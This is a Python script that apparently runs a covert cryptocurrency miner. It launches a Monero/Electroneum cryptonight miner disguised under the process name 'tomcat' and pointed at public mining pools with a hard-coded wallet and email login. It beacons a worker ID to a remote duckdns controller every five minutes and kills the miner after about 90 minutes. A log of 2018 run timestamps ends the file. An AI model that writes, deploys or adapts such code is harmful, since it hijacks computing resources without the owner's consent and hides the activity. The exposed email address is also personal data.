import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:44:05.392944
#2018-02-17 16:32:05.442076
#2018-02-17 18:20:06.478735
#2018-02-17 20:08:04.822373
#2018-02-17 21:55:06.399740
#2018-02-17 23:40:05.578023
#2018-02-18 01:31:04.886132
#2018-02-18 03:17:06.264202
#2018-02-18 05:06:01.615648
#2018-02-18 06:57:07.185101
#2018-02-18 08:45:01.537848
#2018-02-18 10:32:05.638316
#2018-02-18 12:17:03.596727
#2018-02-18 14:04:05.946501
#2018-02-18 15:54:05.339733
#2018-02-18 17:45:03.175146
#2018-02-18 19:32:06.813340
#2018-02-18 21:17:01.285069
#2018-02-18 23:05:01.820768
#2018-02-19 00:52:06.404619
#2018-02-19 02:39:05.125827
#2018-02-19 04:26:04.501865
#2018-02-19 06:11:06.680805
#2018-02-19 07:58:07.008578
#2018-02-19 09:49:05.419103
#2018-02-19 11:37:01.394113
#2018-02-19 13:23:07.988952
#2018-02-19 15:11:07.127871
#2018-02-19 16:58:08.729755
#2018-02-19 18:45:04.005208
#2018-02-19 20:36:04.461147
#2018-02-19 22:22:08.146558
#2018-02-20 00:08:06.766735
#2018-02-20 01:55:06.335538
#2018-02-20 03:44:05.006923
#2018-02-20 05:30:04.918700
#2018-02-20 07:14:07.129150
#2018-02-20 09:01:06.911929
#2018-02-20 10:44:07.702397
#2018-02-20 12:31:04.781570
#2018-02-20 14:17:08.584782
#2018-02-20 16:02:01.268671
#2018-02-20 17:50:15.081419
#2018-02-20 19:42:07.487655
#2018-02-20 21:31:05.188965
#2018-02-20 23:15:01.714771
#2018-02-21 00:58:07.520733
#2018-02-21 02:44:06.174517
#2018-02-21 04:32:07.330892
#2018-02-21 06:19:01.378900
#2018-02-21 08:05:06.202799
#2018-02-21 09:51:05.097423
#2018-02-21 11:41:01.408189
#2018-02-21 13:32:07.700373
#2018-02-21 15:17:06.854809
#2018-02-21 17:08:09.088234
#2018-02-21 18:57:07.776076
#2018-02-21 20:46:01.495817
#2018-02-21 22:32:01.974322
#2018-02-22 00:22:07.393623
#2018-02-22 02:09:07.783863
#2018-02-22 03:55:06.069160
#2018-02-22 05:42:07.775542
#2018-02-22 07:27:05.278920
#2018-02-22 09:14:07.035652
#2018-02-22 11:03:05.423771
#2018-02-22 12:49:02.133256
#2018-02-22 14:34:04.060507
#2018-02-22 16:21:06.996613
#2018-02-22 18:09:10.460831
#2018-02-22 19:59:09.335032
#2018-02-22 21:49:07.676866
#2018-02-22 23:38:21.886550
#2018-02-23 01:27:01.871575
#2018-02-23 03:14:04.428048
#2018-02-23 05:01:06.378059
#2018-02-23 06:45:08.659896
#2018-02-23 08:37:07.403565
#2018-02-23 10:53:08.163717
#2018-02-23 12:50:09.942301
#2018-02-23 14:34:07.707728
#2018-02-23 16:25:11.552179
#2018-02-23 18:11:07.303828
#2018-02-23 19:55:08.243494
#2018-02-23 21:38:06.636205
#2018-02-23 23:25:06.098573
#2018-02-24 01:18:07.300773
#2018-02-24 03:09:07.569245
#2018-02-24 04:55:04.091615
#2018-02-24 06:40:01.552940
#2018-02-24 08:29:07.016648
#2018-02-24 10:17:02.242158
#2018-02-24 12:12:05.573854
#2018-02-24 13:59:03.618605
#2018-02-24 15:51:05.825218
#2018-02-24 17:38:01.556744
#2018-02-24 19:24:03.887706
#2018-02-24 21:14:03.456471
#2018-02-24 23:49:07.051687
#2018-02-25 03:08:06.184014
#2018-02-25 06:49:04.266167